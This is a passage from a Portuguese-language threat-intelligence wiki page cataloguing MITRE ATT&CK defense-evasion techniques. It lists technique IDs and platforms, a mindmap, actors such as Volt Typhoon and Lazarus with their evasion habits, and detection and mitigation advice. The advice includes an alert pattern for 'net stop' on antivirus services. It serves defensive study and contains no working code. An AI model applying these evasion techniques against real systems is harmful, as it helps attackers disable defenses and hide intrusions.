| [[t1562-013-disable-or-modify-network-device-firewall\|T1562.013 - Disable or Modify Network Device Firewall]] | T1562.013 | T1562.013 - Disable or Modify Network Device Firewall | <ul><li>Network Devices</li></ul> | | [[t1564-hide-artifacts\|T1564 - Hide Artifacts]] | T1564 | T1564 - Hide Artifacts | <ul><li>Linux</li><li>Office Suite</li><li>Windows</li><li>macOS</li><li>ESXi</li></ul> | | [[t1564-001-hidden-files-and-directories\|T1564.001 - Hidden Files and Directories]] | T1564.001 | T1564.001 - Hidden Files and Directories | <ul><li>Linux</li><li>Windows</li><li>macOS</li></ul> | | [[t1564-002-hidden-users\|T1564.002 - Hidden Users]] | T1564.002 | T1564.002 - Hidden Users | <ul><li>macOS</li><li>Windows</li><li>Linux</li></ul> | | [[t1564-003-hidden-window\|T1564.003 - Hidden Window]] | T1564.003 | T1564.003 - Hidden Window | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1564-004-ntfs-file-attributes\|T1564.004 - NTFS File Attributes]] | T1564.004 | T1564.004 - NTFS File Attributes | <ul><li>Windows</li></ul> | | [[t1564-005-hidden-file-system\|T1564.005 - Hidden File System]] | T1564.005 | T1564.005 - Hidden File System | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1564-006-run-virtual-instance\|T1564.006 - Run Virtual Instance]] | T1564.006 | T1564.006 - Run Virtual Instance | <ul><li>Linux</li><li>macOS</li><li>Windows</li><li>ESXi</li></ul> | | [[t1564-007-vba-stomping\|T1564.007 - VBA Stomping]] | T1564.007 | T1564.007 - VBA Stomping | <ul><li>Linux</li><li>Windows</li><li>macOS</li></ul> | | [[t1564-008-email-hiding-rules\|T1564.008 - Email Hiding Rules]] | T1564.008 | T1564.008 - Email Hiding Rules | <ul><li>Windows</li><li>Linux</li><li>macOS</li><li>Office Suite</li></ul> | | [[t1564-009-resource-forking\|T1564.009 - Resource Forking]] | T1564.009 | T1564.009 - Resource Forking | <ul><li>macOS</li></ul> | | [[t1564-010-process-argument-spoofing\|T1564.010 - Process Argument Spoofing]] | T1564.010 | T1564.010 - Process Argument Spoofing | <ul><li>Windows</li></ul> | | [[t1564-011-ignore-process-interrupts\|T1564.011 - Ignore Process Interrupts]] | T1564.011 | T1564.011 - Ignore Process Interrupts | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1564-012-filepath-exclusions\|T1564.012 - File/Path Exclusions]] | T1564.012 | T1564.012 - File/Path Exclusions | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1564-013-bind-mounts\|T1564.013 - Bind Mounts]] | T1564.013 | T1564.013 - Bind Mounts | <ul><li>Linux</li></ul> | | [[t1564-014-extended-attributes\|T1564.014 - Extended Attributes]] | T1564.014 | T1564.014 - Extended Attributes | <ul><li>Linux</li><li>macOS</li></ul> | | [[t1574-002-dll-side-loading\|T1574.002 - Hijack Execution Flow: DLL Side-Loading]] | T1574.002 | T1574.002 - Hijack Execution Flow: DLL Side-Loading | <ul><li>Windows</li></ul> | | [[t1578-modify-cloud-compute-infrastructure\|T1578 - Modify Cloud Compute Infrastructure]] | T1578 | T1578 - Modify Cloud Compute Infrastructure | <ul><li>IaaS</li></ul> | | [[t1578-001-create-snapshot\|T1578.001 - Creaté Snapshot]] | T1578.001 | T1578.001 - Creaté Snapshot | <ul><li>IaaS</li></ul> | | [[t1578-002-create-cloud-instance\|T1578.002 - Creaté Cloud Instance]] | T1578.002 | T1578.002 - Creaté Cloud Instance | <ul><li>IaaS</li></ul> | | [[t1578-003-delete-cloud-instance\|T1578.003 - Delete Cloud Instance]] | T1578.003 | T1578.003 - Delete Cloud Instance | <ul><li>IaaS</li></ul> | | [[t1578-004-revert-cloud-instance\|T1578.004 - Revert Cloud Instance]] | T1578.004 | T1578.004 - Revert Cloud Instance | <ul><li>IaaS</li></ul> | | [[t1578-005-modify-cloud-compute-configurations\|T1578.005 - Modify Cloud Compute Configurations]] | T1578.005 | T1578.005 - Modify Cloud Compute Configurations | <ul><li>IaaS</li></ul> | | [[t1599-network-boundary-bridging\|T1599 - Network Boundary Bridging]] | T1599 | T1599 - Network Boundary Bridging | <ul><li>Network Devices</li></ul> | | [[t1599-001-network-address-translation-traversal\|T1599.001 - Network Address Translation Traversal]] | T1599.001 | T1599.001 - Network Address Translation Traversal | <ul><li>Network Devices</li></ul> | | [[t1600-weaken-encryption\|T1600 - Weaken Encryption]] | T1600 | T1600 - Weaken Encryption | <ul><li>Network Devices</li></ul> | | [[t1600-001-reduce-key-space\|T1600.001 - Reduce Key Space]] | T1600.001 | T1600.001 - Reduce Key Space | <ul><li>Network Devices</li></ul> | | [[t1600-002-disable-crypto-hardware\|T1600.002 - Disable Crypto Hardware]] | T1600.002 | T1600.002 - Disable Crypto Hardware | <ul><li>Network Devices</li></ul> | | [[t1601-modify-system-image\|T1601 - Modify System Image]] | T1601 | T1601 - Modify System Image | <ul><li>Network Devices</li></ul> | | [[t1601-001-patch-system-image\|T1601.001 - Patch System Image]] | T1601.001 | T1601.001 - Patch System Image | <ul><li>Network Devices</li></ul> | | [[t1601-002-downgrade-system-image\|T1601.002 - Downgrade System Image]] | T1601.002 | T1601.002 - Downgrade System Image | <ul><li>Network Devices</li></ul> | | [[t1610-deploy-container\|T1610 - Deploy Container]] | T1610 | T1610 - Deploy Container | <ul><li>Containers</li></ul> | | [[t1612-build-image-on-host\|T1612 - Build Image on Host]] | T1612 | T1612 - Build Image on Host | <ul><li>Containers</li></ul> | | [[t1620-reflective-code-loading\|T1620 - Reflective Code Loading]] | T1620 | T1620 - Reflective Code Loading | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1622-debugger-evasion\|T1622 - Debugger Evasion]] | T1622 | T1622 - Debugger Evasion | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1647-plist-file-modification\|T1647 - Plist File Modification]] | T1647 | T1647 - Plist File Modification | <ul><li>macOS</li></ul> | | [[t1655-hide-artifacts-android\|T1655 - Hide Artifacts (Android)]] | T1655 | T1655 - Hide Artifacts (Android) | <ul><li>Android</li></ul> | | [[t1656-impersonation\|T1656 - Impersonation]] | T1656 | T1656 - Impersonation | <ul><li>Linux</li><li>macOS</li><li>Office Suite</li><li>SaaS</li><li>Windows</li></ul> | | [[t1666-modify-cloud-resource-hierarchy\|T1666 - Modify Cloud Resource Hierarchy]] | T1666 | T1666 - Modify Cloud Resource Hierarchy | <ul><li>IaaS</li></ul> | | [[t1672-email-spoofing\|T1672 - Email Spoofing]] | T1672 | T1672 - Email Spoofing | <ul><li>Office Suite</li><li>Windows</li><li>macOS</li><li>Linux</li></ul> | | [[t1678-delay-execution\|T1678 - Delay Execution]] | T1678 | T1678 - Delay Execution | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> | | [[t1679-selective-exclusion\|T1679 - Selective Exclusion]] | T1679 | T1679 - Selective Exclusion | <ul><li>Windows</li></ul> | <!-- SerializedQuery END --> ## Mindmap — Técnicas de Evasão de Defesas ```mermaid mindmap root((TA0005<br/>Defense Evasion)) Ofuscação T1027 Obfuscated Files T1140 Deobfuscaté/Decode T1620 Reflective Code Loading Packers e Crypters Mascaramento T1036 Masquerading T1218 System Binary Proxy LOLBins LOTL Processo Legítimo Desativar Defesas T1562 Impair Defenses T1562.001 Disable Tools T1014 Rootkit T1497 Sandbox Evasion Remoção de Evidências T1070 Indicator Removal Limpar Logs Deletar Arquivos Temporários Process Injection T1055 Process Injection DLL Injection Process Hollowing Hijacking T1574 Hijack Execution Flow T1574.002 DLL Side-Loading T1112 Modify Registry Autenticação Alternativa T1550.001 App Access Token T1550.002 Pass the Hash T1078 Valid Accounts ``` ## Atores que Utilizam esta Tática | Ator | Técnica de Evasão Característica | |------|----------------------------------| | [[g1017-volt-typhoon\|Volt Typhoon]] | LOTL completo — wmic, netsh, ntdsutil exclusivamente | | [[Cozy Bear]] | Ofuscação pesada de PowerShell, process injection em lsass | | [[g0032-lazarus-group\|Lazarus Group]] | DLL side-loading, sandbox evasion, anti-VM checks | | [[g0096-apt41\|APT41]] | Rootkits, firmware implants, reflective DLL loading | | [[g0034-sandworm\|Sandworm]] | Indicator removal, wiper malware que destrói evidências | ## Detecção e Mitigação ### Detecção - **AMSI / Script Block Logging:** Captura de scripts PowerShell após desofuscação - **EDR Comportamental:** Detecção de process hollowing, reflective DLL loading - **SIEM:** Alertas para `net stop` em serviços de AV/EDR, desabilitação do Windows Defender - **Threat Hunting:** Buscar LOLBins usados de forma anômala (wmic, certutil, mshta) - **File Integrity Monitoring:** Alertas para modificação de arquivos de log de sistema ### Mitigação - Implementar **tamper protection** no Microsoft Defender (impede desabilitação) - Restringir execução de LOLBins não essenciais via AppLocker/WDAC - Centralizar logs em SIEM imutável (adversários não conseguem apagar) - Habilitar **Protected Process Light (PPL)** para lsass.exe - Deploy de EDR com capacidade de detecção comportamental (não apenas assinaturas) ## Relevância LATAM/Brasil Malware bancário brasileiro como [[s0531-grandoreiro|Grandoreiro]] e [[mekotio|Mekotio]] utiliza extensivamente técnicas de sandbox evasion — detectando ambiente de análise via verificações de resolução de tela, movimentos de mouse, e presença de ferramentas de análise. Packers customizados e crypters locais tornam esses samples resistentes à detecção por antivírus. O ecossistema underground brasileiro comercializa serviços de "criptagem" — transformação de malware detectável em variante que passa por scanners — por preços acessíveis, democratizando técnicas de evasão avançadas para grupos menos sofisticados. - [[ta0004-privilege-escalation|TA0004 - Privilege Escalation]] — fase anterior - [[ta0006-credential-access|TA0006 - Credential Access]] — fase seguinte - [[t1027-obfuscated-files|T1027 - Obfuscated Files]] — ofuscação de payload - [[t1036-masquerading|T1036 - Masquerading]] — disfarce de processo malicioso - [[t1562-001-disable-tools|T1562.001 - Disable or Modify Tools]] — desabilitação de AV/EDR - [[t1070-indicator-removal|T1070 - Indicator Removal]] — remoção de evidências - [[t1218-system-binary-proxy-execution|T1218 - System Binary Proxy Execution]] — abuso de binários legítimos - [[Sandbox Evasion]] — anti-análise - [[g1017-volt-typhoon|Volt Typhoon]] — referência de LOTL puro - [[_techniques|Índice de Técnicas]] — visão geral de todas as técnicas documentadas ## Referências - [[ta0005-*|MITRE ATT&CK - TA0005 Defense Evasion]] - [CISA — Living Off the Land Techniques](https://www.cisa.gov/resources-tools/resources/living-off-the-land)